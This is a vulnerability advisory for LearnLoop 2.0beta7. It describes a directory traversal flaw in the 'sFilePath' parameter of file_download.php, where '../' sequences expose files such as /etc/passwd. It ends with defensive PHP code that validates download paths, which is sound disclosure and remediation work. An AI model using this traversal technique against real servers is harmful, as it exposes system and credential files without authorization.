vendor: LearnLoop 2.0beta7
by: Unknown
CVSS: 5.5 (MEDIUM)
Remote File Disclosure
CWE: 22
Product Name: LearnLoop 2.0beta7
Affected Version From: 2.0beta7
Affected Version To: 2.0beta7
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
The vulnerability allows an attacker to disclose files from the target system by manipulating the 'sFilePath' parameter in the 'file_download.php' script. By traversing the directory structure with '../', an attacker can access sensitive files such as '/etc/passwd'.
Mitigation:
The vendor should validate and sanitize user input in the 'sFilePath' parameter to prevent directory traversal attacks. Additionally, access control should be implemented to restrict access to sensitive files.
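One way to apply the input validation described above, as an added example (not LearnLoop's own code): the requested path is canonicalised and served only if it resolves inside a fixed download directory. `DOWNLOAD_ROOT` and `resolve_download()` are hypothetical names, and the storage directory is an assumption.

```php
<?php
// Added illustration, not LearnLoop code. DOWNLOAD_ROOT and
// resolve_download() are hypothetical; the directory is an assumption.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/var/www/learnloop/files';

/** Map a user-supplied sFilePath to a real file under $root, or null. */
function resolve_download(string $requested, string $root): ?string
{
    // Empty input and NUL bytes are never valid file names.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() collapses '../' and resolves symlinks; it returns
    // false when the target does not exist.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment check on the canonical path. The trailing separator
    // stops a sibling such as ".../files_old" from matching ".../files".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// An authorization check for the current user belongs here, before
// any file is looked up.
$raw  = $_GET['sFilePath'] ?? '';
$path = is_string($raw) ? resolve_download($raw, DOWNLOAD_ROOT) : null;
if ($path === null) {
    http_response_code(404); // same response for "missing" and "outside root"
    exit;
}
$name = addcslashes(basename($path), "\"\\");
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

Checking the canonical path after `realpath()` rather than filtering `../` from the raw string also covers encoded or nested traversal sequences and symlinks that point outside the download directory.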